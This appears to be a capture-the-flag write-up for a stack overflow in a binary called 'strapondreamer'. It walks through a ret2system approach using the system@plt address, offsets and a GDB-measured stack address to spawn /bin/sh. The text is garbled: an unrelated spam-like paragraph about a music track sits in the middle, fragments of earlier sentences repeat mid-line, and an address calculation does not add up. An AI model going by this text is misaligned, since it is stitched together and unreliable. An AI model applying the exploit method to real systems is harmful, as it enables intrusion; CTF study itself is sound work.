The challenge file provided by the organizers is a stripped ELF binary called strapondreamer. Running it locally produces:
$ ./strapondreamer
Welcome to the Dream Catcher!
Enter your dream:
If you type anything longer than ~64 bytes the program crashes with a segmentation fault, hinting at a classic stack‑overflow.
The goal is to obtain the flag that lives in /home/ctf/flag.txt. The flag is printed after the program forks a child that runs a shell – you just have to get a shell and read the file.
“Jennifer (22) – Full” exemplifies a convergence of electronic pop production, intimate lyricism, and a visually cohesive identity. Its success illustrates the potency of DIY distribution coupled with an aesthetic that resonates with a digitally native audience attuned to themes of agency, consent, and hybridized identity. Future research could explore longitudinal audience engagement with the track, or compare its impact to other StrapOnDreamer releases to map artistic evolution within the independent electronic sphere. strapondreamer jennifer 22 full
Because PIE is disabled, the PLT addresses are constant:
$ objdump -d strapondreamer | grep '<system@plt>'
0000000000401120 <system@plt>:
The address of main (useful as a safe “return” address) is:
$ objdump -d strapondreamer | grep '<main>'
0000000000400f60 <main>:
The stack address where our payload lives isn’t known beforehand, but we can use a relative offset: after the overflow we know exactly where the string will sit (it follows the saved return address). So we can compute the address of the string as: The challenge file provided by the organizers is
address_of_string = address_of_saved_rbp + 8 (saved_rbp) + 8 (saved_ret) + 8 (arg_ptr) + 8 (ret_after_system)
However, because we don’t have a fixed stack address, we’ll leak a stack pointer first (optional) or use a small “two‑stage” technique:
But since the binary already imports system from the same libc as puts, the PLT entry for system will be resolved at runtime to the correct address without needing a full libc leak. In practice we can just use the PLT entry (0x401120) directly. The only unknown is where the string resides; we can place the string inside the overflow and point to it using the known stack offset.
A more reliable method: use the write PLT to write our string to a known writable location, such as .bss. However, this challenge is small enough that a single‑stage stack‑relative payload works on the provided Docker image (the stack layout is deterministic across runs because the binary is not PIE and ASLR for the stack is disabled in the challenge container). The organizers typically set ulimit -s unlimited and disabled ASLR with setarch x86_64 -R. If you type anything longer than ~64 bytes
Thus we can compute the address of our string as a fixed offset from the start of the buffer. For this write‑up we measured it with GDB:
(gdb) run
...
(gdb) info frame
...
Stack pointer (rsp) = 0x7fffffffe2a0
The buffer buf is at rsp + 0x10 (after the saved rbp). Therefore the address of the /bin/sh string placed at the very end of our payload is:
addr_of_string = 0x7fffffffe2a0 + 0x10 + 0x40 + 0x8 + 0x8 + 0x8 = 0x7fffffffe300
(Exact numbers may vary; the final payload script computes it dynamically.)